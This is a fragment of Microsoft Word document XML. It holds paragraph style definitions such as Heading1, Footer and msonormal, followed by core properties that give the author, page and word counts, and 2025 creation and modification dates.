  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading1Char"/>
    <w:uiPriority w:val="9"/>
    <w:qFormat/>
    <w:rsid w:val="0058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A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437D"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="0" w:line="259" w:lineRule="auto"/>
      <w:outlineLvl w:val="9"/>
    </w:pPr>
    <w:rPr>
      <w:kern w:val="0"/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>
      <w:lang w:eastAsia="el-G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14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145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8145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F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F3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00A16F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F3C"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00E202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l-GR"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="msonormal0">
    <w:name w:val="msonormal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="009166C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l-G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6C5"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier New" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Courier New" w:cs="Courier New"/>
      <w:kern w:val="0"/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:eastAsia="el-G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87E88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BE7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6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homerhistorical.com/pages/yb.ht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F801332-BF0E-4AA4-82CD-0D153D8A7549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27</Pages>
  <Words>4879</Words>
  <Characters>26347</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>219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ΑΛΕΞΟΠΟΥΛΟΣ ΙΩΑΝΝΗΣ</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>ΑΛΕΞΟΠΟΥΛΟΣ ΙΩΑΝΝΗΣ</cp:lastModifiedBy>
  <cp:revision>129</cp:revision>
  <cp:lastPrinted>2025-08-28T22:10:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-12T14:51:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-05T21:51:00Z</dcterms:modified>
</cp:coreProperties>
</file>